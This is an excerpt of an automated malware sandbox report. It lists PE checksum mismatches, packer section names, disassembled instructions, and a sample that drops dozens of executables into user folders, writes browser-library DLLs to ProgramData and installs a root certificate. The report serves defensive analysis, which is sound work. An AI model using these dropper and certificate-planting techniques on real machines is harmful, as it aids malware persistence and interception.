                        Source: LuXFYkxCqJv6U5aGsy6shXnX.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 01ySZukOlUcP5NF6FSceJyuX.exe.3.drStatic PE information: real checksum: 0x529b04 should be: 0x529bef
                        Source: 8Hs13Qx2L9GIxFG02dQv6hVO.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: z443T0kZxO5VAxRMw1cjpQdZ.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: W9xI9q4MOUfVc9D8gPa3VVtC.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: FQM2AbwszjT1lQzUoXGDxSTy.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: Xd5tydDy6Vge5DSIUsA4B8HM.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 9teA9V2job1p0o0lcg2CuXcR.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: IiFh1rXOMpGB7BnxmUig3wkQ.exe.3.drStatic PE information: real checksum: 0x52a1e9 should be: 0x52a2d4
                        Source: a17F4G7WEa7FlwVixhjX6uYK.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: tByrAP8ibeDbCSADnquqVBQi.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: qGkRm1tZi3ZgbNWlurynDnJq.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: skOP6h6U62cLrOTEAXi7XUT4.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: mPkGObww76qlp1C09a4tgBES.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: zfeRg1KL3b6mzyGkHfaolHvL.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: eRAYqRRIfUj5yD0ovEh9HMd4.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: ugGFIzLnD3Xk89zL7XSYeDGh.exe.3.drStatic PE information: real checksum: 0x529b04 should be: 0x529bef
                        Source: 3CfyWUQfEPMLfwgMw9RKzj9q.exe.3.drStatic PE information: real checksum: 0x52cacd should be: 0x52cbb8
                        Source: TD0DvTWbvdprpaFzaf7f79H8.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: ra8RK0HZwqsQsFKuKAOljczn.exe.3.drStatic PE information: real checksum: 0x524fa9 should be: 0x525094
                        Source: nMCfbx6hx0DUWGYJuDAMUAIJ.exe.3.drStatic PE information: real checksum: 0x524fa9 should be: 0x525094
                        Source: gs73fZcRyFDJYoYkZbrtadCy.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: IWNHTSCpSFApuke51w2EhXTa.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: jZXBdg5rull5j6LgJCWVgVos.exe.3.drStatic PE information: real checksum: 0x523e46 should be: 0x523f31
                        Source: x3HF5f4W7zVGUR0m1DVxQqdq.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 0Flev5sTDyJ3duKpLfv5ka2Z.exe.3.drStatic PE information: real checksum: 0x52cacd should be: 0x52cbb8
                        Source: Fh7qhqxo9lqcq8fZJGpCZFiC.exe.3.drStatic PE information: real checksum: 0x53171f should be: 0x53180a
                        Source: 0DWhHyQpdxsJp4gA1M0WjqnA.exe.3.drStatic PE information: real checksum: 0x53171f should be: 0x53180a
                        Source: zWhvfqZrtT7TUoWor4gRArPv.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 5Q13Z1W5QdpwzXbxGFAdEXdB.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 0yHxI2NgcVq897URfu1bGLCU.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 0FR80IiNvxJZyXnpOgiDlYNV.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: H6XhhPCeuwAb2QQK3C3B1Lwl.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: CzCAVDbVcAMwrBna8hMGEVEa.exe.3.drStatic PE information: real checksum: 0x523e46 should be: 0x523f31
                        Source: file.exeStatic PE information: section name: .managed
                        Source: file.exeStatic PE information: section name: _RDATA
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: F9a5CAWDzjn4KX6pZMk93eNG.exe.3.drStatic PE information: section name: .sxdata
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.drStatic PE information: section name: .MPRESS1
                        Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.drStatic PE information: section name: .MPRESS2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0042D355 push esi; ret 4_2_0042D35E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409D06 push ecx; ret 4_2_00409D19
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004275A4 push eax; ret 4_2_004275C2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004097B6 push ecx; ret 4_2_004097C9
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040D1494 push 00000061h; retf 4_2_040D149C
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040CE5D6 pushad ; retf 4_2_040CE5D7
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040CF660 push ecx; iretd 4_2_040CF672
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040D0E85 pushad ; retf 4_2_040D0E8C
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040D28F8 push ebp; iretd 4_2_040D292B
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040D0B6F push 2B991403h; ret 4_2_040D0B76
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0042D355 push esi; ret 11_2_0042D35E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409D06 push ecx; ret 11_2_00409D19
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_004275A4 push eax; ret 11_2_004275C2
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_004097B6 push ecx; ret 11_2_004097C9
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_04121494 push 00000061h; retf 11_2_0412149C
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0411E5D6 pushad ; retf 11_2_0411E5D7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0411F660 push ecx; iretd 11_2_0411F672
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_04120E85 pushad ; retf 11_2_04120E8C
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_041228F8 push ebp; iretd 11_2_0412292B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_04120B6F push 2B991403h; ret 11_2_04120B76
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BCC52F push esp; retf 11_2_05BCC537
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BD1CA2 push dword ptr [esp+ecx-75h]; iretd 11_2_05BD1CA6
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9F6D push ecx; ret 11_2_05BB9F80
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BD780B push eax; ret 11_2_05BD7829
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BCCB2D push esp; retf 11_2_05BCCB2E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9A1D push ecx; ret 11_2_05BB9A30
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0042D355 push esi; ret 19_2_0042D35E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409D06 push ecx; ret 19_2_00409D19
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_004275A4 push eax; ret 19_2_004275C2
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_004097B6 push ecx; ret 19_2_004097C9
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_04191494 push 00000061h; retf 19_2_0419149C

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files to the document folder of the user
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exeJump to dropped file
                        Installs new ROOT certificates
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile created: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Yu3aePJPmCD2ksmvI16UpN6t.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\NDdJEWHR1zXBL7ACRBN1bJsT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\i5XdJ65IHwp8ssJDgSUt738t.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeFile created: C:\Users\user\AppData\Local\Temp\u2r8.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\Or8Lkccj3KUYl1SEoAAXBR7t.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\rCkxIY3aeSpXebK5FfkxePC4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\jl7RUebEK9s2GdCw2naZuXH3.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\KgnOTzWY3o0raijub6ZAid5Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\WMW9Xl8E0Ffe1Nak8GbEfdwd.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\FcF2JyfJLWaSsoJShTukNm1O.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_packageJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\Xd5tydDy6Vge5DSIUsA4B8HM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\y1mf9KikiO68brzuQYIFxwgi.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\wAyxI7uUktpH5TtM4zqnMftR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\LuXFYkxCqJv6U5aGsy6shXnX.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0DWhHyQpdxsJp4gA1M0WjqnA.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\75ML2QNSkdxIefrPkvr0UjCi.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\WjXPtwNxqwEpWrekfMAFvnPV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeFile created: C:\Users\user\AppData\Local\Temp\u1hw.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exeJump to dropped file
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile created: C:\Users\user\AppData\Local\Temp\u5v8.1.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\TZNY2jGrHaeFElorDDQMNtS0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\eRAYqRRIfUj5yD0ovEh9HMd4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\I7GsKiDVRkgU0AqHrZJ1PiD5.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\7725eaa6592c80f8124e769b4e8a07f7[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\9rAJjYr1uJZPfASZhYrXXHW2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\y6XaweA6d3ukZLoFeklnZ9Wr.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\uhjAlwetTCGgkw8uV562JOyG.exeJump to dropped file
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeFile created: C:\Users\user\AppData\Local\Temp\u33c.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\x3HF5f4W7zVGUR0m1DVxQqdq.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\vg2jjUpoYoMsgaKeZN28z4wt.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\sVP78YSUuB86fyhUIuxT6msl.exeJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\hh.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nUulTm4TlMq3112NFdqwQUUv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\5vt9Hlt4sHU3M9tLNtkwRemY.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937415374172.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0Bos1rjatCgxKDAqeI5gMROw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\ehuKK8NkGWXoqtsyMQJdZvL3.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\r1G18V8V8shEwNWwtcDq5rcn.exeJump to dropped file
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeFile created: C:\Users\user\AppData\Local\Temp\u4dc.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\tw6SuwCix1CRVfIYPT24Ycm6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\SZ0cEDCrvP4evlvcOCUltmHu.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_packageJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\rSpYcYxqkOCX3T18aW46DWhn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\z443T0kZxO5VAxRMw1cjpQdZ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\xvXQt3HWUPHZOypqdys3bcAm.exeJump to dropped file
